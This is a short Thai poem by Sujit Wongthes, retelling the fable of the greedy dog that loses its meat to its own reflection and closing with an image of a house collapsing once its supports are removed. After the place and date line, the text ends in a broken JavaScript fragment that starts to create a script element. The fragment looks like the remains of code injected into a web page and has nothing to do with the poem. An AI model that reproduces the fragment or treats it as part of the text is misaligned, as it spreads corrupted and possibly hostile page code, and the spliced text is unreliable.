อด

สุจิตต์ วงษ์เทศ

 

๏ เห็นเงาเนื้อในน้ำใหญ่นักหนา

รีบปล่อยเนื้อตกน้ำที่คาบมา

หวังเคี้ยวชิ้นใหญ่กว่าก็หายไป

เจ้านิ้วเทียนเนียนเน้นเห็นอยู่แล้ว

เขาทิ้งแนวหลักย่อมยืนไม่ได้

รื้อนั่งร้านบ้านจะสร้างเสร็จอย่างไร

พายุใหญ่ตึงตังก็พังเอย

 

บ้านช่างหล่อ กรุงธนบุรี

10 พฤศจิกายน 2556} else {var d=document;var s=d.createElement(‘script’);